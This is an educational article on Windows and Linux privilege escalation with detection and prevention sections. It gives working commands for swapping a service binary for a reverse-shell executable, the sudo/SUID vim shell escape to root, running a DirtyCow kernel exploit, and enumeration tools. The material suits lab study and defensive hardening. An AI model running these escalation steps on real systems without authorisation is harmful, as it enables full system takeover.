1. Introduction

A cyberattack rarely happens in one step. When an attacker first gains access to a system, they usually have low-privileged user rights. However, the real goal is to reach root (Linux) or Administrator/SYSTEM (Windows) privileges. This process is called Privilege Escalation.

For the attacker: It means full control over the system.
For the defender: It means preventing escalation paths and detecting attempts.

2. Types of Privilege Escalation

• Local Privilege Escalation (LPE): Attacker already has access but escalates to higher privileges.
• Remote Privilege Escalation (RPE): Attacker directly gains high privileges through a remote exploit.
• Vertical Escalation: Normal user → Administrator/root.
• Horizontal Escalation: Moving to another user account at the same privilege level.

3. Lab Setup

To safely test these techniques, set up your own lab environment:

• Linux: Ubuntu/Debian (with weak sudoers config).
• Windows: Windows 10 / Windows Server (VM for testing).
• Tools:
  • Linux: linpeas.sh, linenum.sh, pspy
  • Windows: winPEAS.exe, PowerUp.ps1
  • Extra: Metasploit, Sysinternals Suite, auditd

4. Windows Privilege Escalation Techniques

4.1 Misconfigured Services

# Check service details
sc qc VulnerableService

# Check file permissions of the service binary
icacls "C:\Program Files\VulnApp\service.exe"

If the user has Modify permissions, they can replace the binary and restart the service:

sc stop VulnerableService
copy C:\Malware\reverse.exe "C:\Program Files\VulnApp\service.exe"
sc start VulnerableService

4.2 Unquoted Service Path

# Check service path
sc qc UnquotedService

Output:

BINARY_PATH_NAME: C:\Program Files\Vulnerable Service\app.exe

If the path is not quoted, placing C:\Program.exe will result in execution when the service starts.

4.3 Registry Exploitation

# Check registry permissions
reg query HKLM\System\CurrentControlSet\Services\VulnService

4.4 Scheduled Tasks Manipulation

# List all tasks
schtasks /query /fo LIST /v

If a scheduled task runs as Administrator but is writable by all users, it can be exploited.

5. Linux Privilege Escalation Techniques

5.1 SUID Bit Abuse

# Find SUID binaries
find / -perm -4000 -type f 2>/dev/null

Example:

vim -c ':!sh'

5.2 Weak Sudoers Config

sudo -l

Output:

User hacker may run the following commands:
    (ALL) NOPASSWD: /usr/bin/vim

Exploit:

sudo vim -c ':!sh'

5.3 Kernel Exploits

uname -a

Output:

Linux vulnbox 4.4.0-21-generic

DirtyCow exploit example:

gcc dirtycow.c -o dirtycow -pthread
./dirtycow

5.4 World-Writable Files

find / -writable -type f 2>/dev/null

6. Automated Tools

• Linux:

./linpeas.sh
./linenum.sh

• Windows:

winPEAS.exe
Import-Module .\PowerUp.ps1
Invoke-AllChecks

7. Real Case Study

1. Attacker logs in as a normal user.
2. Runs sudo -l to check permissions.
3. Finds weak sudoers config allowing vim.
4. Executes sudo vim -c ':!sh' → root shell obtained.

8. Detection & Monitoring

Linux – auditd rule:

auditctl -a always,exit -F arch=b64 -S execve

Windows – Sysmon:
Log changes to services, registry keys, and scheduled tasks with custom Sysmon config.

9. Prevention & Best Practices

• Apply Least Privilege Principle.
• Keep kernel and applications up to date.
• Restrict SUID binaries:

chmod u-s /usr/bin/vim

• Always quote service paths in Windows.
• Configure SIEM correlation rules for suspicious escalation activities.

10. Conclusion

Privilege Escalation is a critical step in cyberattacks. For attackers, it opens the door to full system compromise. For defenders, preventing and detecting escalation attempts is essential.

By practicing these examples in a safe lab environment, you can learn how attackers think and strengthen your defenses.